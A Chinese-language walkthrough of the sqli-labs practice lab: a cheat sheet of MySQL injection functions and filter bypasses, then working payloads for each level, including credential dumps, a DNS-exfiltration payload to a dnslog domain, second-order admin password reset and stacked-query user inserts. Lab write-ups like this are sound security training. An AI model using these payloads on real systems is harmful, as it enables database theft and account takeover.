sqli-labs通关笔记

sqli-labs通关笔记
Takake1.通用查询
1.1.函数
- concat(arg1,arg2,arg3); arg可拼接字符串或者查询语句或列名
- group_concat(arg); 用于将当列中的所有数据拼接成一组返回
- concat_ws(str1,arg1,arg2,arg3);使用str1将参数中的三个数据进行拼接
- substr(str,argint1,argint2);表示字符串截取, argint1表示截取开始索引,argint2,表示截取长度,索引从1开始
- mid,substr的完美替代品
1 | select mid((select database()),1,1); |
- ascii(arg), 用于字符返回的ascii码,返回数字,常用于二分法。可使用ord替代
- extractvalue(1,concat(0x7e,(arg),0x7e));arg为查询参数,最长有效字符为32位
- updatexml(1,concat(0x7e,(arg),0x7e),1);和上面同理
- exp(arg); exp报错函数
- sleep(argint);延时注入函数,argint为数字表示延时秒数
- group by x; group by报错,只适用于较少版本
- order by argint;arg为数字用于上条查询语句返回行数
- regexp 可以代替等号
- between argint and argint 可用于ascii判断,或者当两参数相同时可用来代替等号
- limit argint1,argint2 argint1,为索引, argint2为限制数量 索引从0开始
- 逗号过滤绕过特技
在堆叠注入中使用 cross join 绕过逗号过滤,
eg:
1
INSERT INTO users SELECT * FROM (SELECT 3)a CROSS JOIN (SELECT 'systest')b CROSS JOIN (SELECT '15661561521')c
在联合注入中使用join绕过逗号过滤
使用offset绕过 limit后的逗号过滤 limit 1 offset 0等于 limit 1,0;
使用from x for 1 绕过substr()中的逗号过滤
具体示例https://github.com/takakie/CVE/blob/main/home-rental/home-rental-sqlinject1.md
1.2.特殊字符
- 0x7e 等于 ~
- 0x81~0xFF %df用于宽字节注入 将后面的特殊符号给吃掉一个,利用中文的两个字节的特性
- /* / –+ /!* */ ; # 注释
1.3.特殊表,列,库
- information_schema 存储库中所有的库表信息
- schemata 用于查询都有那些库
- tables 用于查询哪个库中都有那些表
- columns 用于查询哪个表中都有那些列
- 库名schema_name,表名table_name,列名column_name
1.4.特殊查询语句
查当前库 select database()
查当前数据版本 select version()
查当前用户 select user()
查数据库中都有哪些库
1
select group_concat(schema_name) from information_schema.schemata
查对应库中都有哪些表(注意这里是table_schema不是schema_name)
1
select group_concat(table_name) from information_schema.tables where table_schema = 'args'
查对应表中都有哪些列
1
select group_concat(column_name) from information_schema.columns where table_name = 'args'
报错查询语句
1
2
3
4
5and updatexml(1,concat(0x7e,(select database()),0x7e),1);
and extractvalue(1,concat(0x7e,(select database()),0x7e));
# 查询库中列为flag的表和对应库
and updatexml(1,(concat(0x7e,(select concat_ws('@',1,table_schema,table_name) from information_schema.columns where column_name='flag' limit 1,1),0x7e)),1)
exp(~(select * from (select user())as a))时间盲注
1
2and if(substr((select database()),1,1)='r',sleep(1),1)
and if(ascii(substr((select database()),1,1))>100,sleep(1),1)查询对应数据表中的数据
1
2select 1,(select group_concat(concat(username,':',password)) from users),database()
select 1,(select concat_ws('~',id,username,password) from users limit 1,1),3flag判空
1
2select flag from metinfo.met_lang where COALESCE(flag, '') != '';
select flag from metinfo.met_lang where flag != '' and flag is not null;
2.课程笔记
1.Less 1
- 直接单引号字符型型注入payload : ‘
- ?id=-1’ union select 1, 2, 3 –+
2.Less 2
- ?id=-1 union select 1, 2, 3 –+
3.Less 3
- ?id=-1’) union select 1,2,3 –+
4.Less 4
- ?id=-1”) union select 1,2,3 –+
5.Less 5
- ?id=1’ and updatexml(1,concat(0x7e,database(),0x7e),1) –+
6.Less 6
- ?id=1” and updatexml(1,concat(0x7e,database(),0x7e),1) –+
7.Less 7
- ?id=1’))+and+load_file(concat(‘//‘,(database()),’.btcee6.dnslog.cn/123’))–+
8.Less 8
- ?id=1’+and+1=if(substr(database(),1,1)=’s’,1,2)–+
9.Less 9
- ?id=1’+and+if(1=1,sleep(2),2)–+
10.Less 10
- ?id=1%22+and+if(substr(user(),1,1)=’r’,sleep(1),1)–+
11.Less 11
- uname=admin’+union+select+(select+flag+from+metinfo.met_lang+where+flag+is+not+null+and+flag+!=+’’limit+0,1),(database())–+&passwd=1234562
12.Less 12
- uname=-admin”)+union+select+1,database()–+&passwd=admin&submit=Submit
13.Less 13
- uname=admin’)+and+updatexml(1,concat(0x7e,user(),0x7e),1)–+
14.Less 14
- uname=admin”+and+extractvalue(1,concat(0x7e,user(),0x7e))–+
15.Less 15
- uname=admin’+and+1=if(substr(database(),1,1)=’s’,1,2)–+
16.Less 16
- uname=admin”)+and+1=if(substr(database(),1,1)=’s’,1,2)–+
17.Less 17
- passwd=123456’+where+updatexml(1,concat(0x7e,database(),0x7e),1);–+
18.Less 18(insert)
- ‘ OR updatexml(1,concat(0x7e,database()),0x7e) OR ‘
1 | # 后端执行的sql语句 |
19.Less 19(insert)
Referer: ‘or updatexml(1,concat(0x7e,database(),0x7e),1) or’
注:如果出现FUNCTION security.updataxml does not exist,函数不存在看一下是不是函数名写错了
20.Less 20
- Cookie: uname=admin’ and updatexml(1,concat(0x7e,database(),0x7e),1) – sd
21.Less 21(Cookie)
- Cookie: uname=J29yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCksMHg3ZSksMSkgb3In
22.Less 22
- Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpLS0gcw==
- Cookie: uname=admin” and updatexml(1,concat(0x7e,database(),0x7e),1)– s
23.Less 23(移除注释)
- ?id=-2’+union+select+1,database(),’
24.Less 24(二次注入)
- 在新建用户中username=admin’+–+1
- 然后登录用户username=admin’+–+1,
- 最后输入任意密码,修改admin密码成功。
25.Less 25 (过滤and\or)
- ?id=-2’+union+select+1,database(),3–+
- || 符号可以代替 or
- anandd,或者双写绕过
26.Less 25a
- ?id=-2+union+select+1,database(),3–+
27.Less 26
%a0 可以绕过空格检查非断行空格
?id=0’union%a0select%a01,database(),’3
28.Less 26a
- ?id=0’)%a0union%a0select%a01,2,(‘3
29.Less 27
- ?id=3’%a0and%a0extractvalue(1,concat(0x7e,database(),0x7e))%a0and%a0’’=’
30.Less 27a
- ?id=1”%a0and%a0substr(database(),5,1)=’r’%a0and%a0””=”
31.Less 28
- ?id=0’)%a0UnIOn%a0seLeCt%a01,database(),(‘3
32.Less 28a
- ?id=3’)%a0and%a0substr(database(),1,1)=’s’%a0and%a0’’=(‘
33.Less 29
- ?id=-1’ union select 1,database(),3 –+
- 有点没看明白
34.Less 30
- ?id=-2” union select 1,database(),3 –+
35.Less 31
- ?id=-1”)union+select+1,database(),3–+
36.Less 32
- ?id=0%df’+union+select+1,database(),3–+
- 利用%df宽字节注入吃掉后面的/
37.Less 33
- ?id=-2%df’+union+select+1,database(),3–+
38.Less 34
- uname=admin%df’+and+extractvalue(1,concat(0x7e,database(),0x7e))–+x
39.Less 35
- ?id=-2+union+select+1,database(),3–+
40.Less 36
- ?id=-2%df’+union+select+1,database(),3–+-
41.Less 37
- uname=admin%df’+and+extractvalue(1,concat(0x7e,database(),0x7e))–+-
42.Less 38
- ?id=-2’+union+select+1,database(),3–+
43.Less 39
?id=-2’+union+select+1,database(),3–+
?id=2’;insert+into+users+(id,username,password)+values+(16,’admin12343’,’password’)–+
44.Less 40
- ?id=1;insert+into+users(username,password)+values(‘admin123’,’123456’)–+
45.Less 41
- ?id=-2;insert+into+users(username,password)+values(‘admin41’,’123456’)–+
46.Less 42
- login_password=admin’;insert+into+users(username,password)+values(‘admin42’,’123’)–+
47.Less 43
- login_password=admin’);insert+into+users(username,password)+values(‘admin43’,’123456’)–+
48.Less 44
- login_password=admin’;insert into users(username,password) values(‘admin44’,’123456’)–+
49.Less 45
- login_password=admin’);insert+into+users(username,password)+values(‘admin45’,’123456’)–+
50.Less 46(Order by)(数字型)
通过rand(0) 和 rand(1)来判断排序是否相同
?sort=rand(extractvalue(1,concat(0x7e,database(),0x7e)))
SELECT * FROM users ORDER BY $id
51.Less 47 (字符串型)
- ?sort=1’+and+extractvalue(1,concat(0x7e,database(),0x7e))–+
- SELECT * FROM users ORDER BY ‘$id’
52.Less 48
- ?sort=rand(substr(database(),2,1)=’e’)
53.Less 49
- ?sort=1’+and+if(substr(database(),1,1)=’a’,sleep(0.2),2)–+
54.Less 50
- ?sort=1;insert+into+users(username,password)+values(‘admin50’,’123456’);
55.Less 51
- ?sort=1’;insert+into+users(username,password)+values(‘admin51’,’123456’);–+
56.Less 52
- ?sort=1;insert+into+users(username,password)+values(‘admin52’,’123456’);
57.Less 53
- ?sort=1’;insert+into+users(username,password)+values(‘admin53’,’123456’);
58.Less 54(正式挑战开始)
- ?id=-1’+union+select+1,(select+secret_HN7O+from+CHALLENGES.8u96bgqr6k+limit 0,1),3–+
1 | # 获取列名 |
59.Less 55
- ?id=-1)+union+select+1,(select secret_MPMF from challenges.6c905h5gnb limit 0,1),3–+
60.Less 56
- ?id=-1”)–+
61.Less 57
- ?id=-2”+union+select+1,(select secret_SP7C from challenges.16vjhzk4v6),3–+
62.Less 58
- ?id=1’+and+exp(~(select * from (select concat(table_name,‘@’,column_name) from information_schema.columns where table_schema=’CHALLENGES’ and substr(column_name,1,6)=’secret’)as a));–+
63.Less 59
- ?id=1+and+exp(~(select * from (select secret_A464 from challenges.ee4euc0k32)as a));–+
64.Less 60
- ?id=2”)+and+exp(~(select * from (select concat(table_name,‘@’,column_name) from information_schema.columns where table_schema=’CHALLENGES’ and substr(column_name,1,6)=’secret’)as a));–+
65.Less 61
- ?id=2’))+and+exp(~(select * from (select secret_5NFH from challenges.3pw6shmv87)as a));–+
66.Less 62
- kUJ5DvUgf8TvbETeyoCDFxsS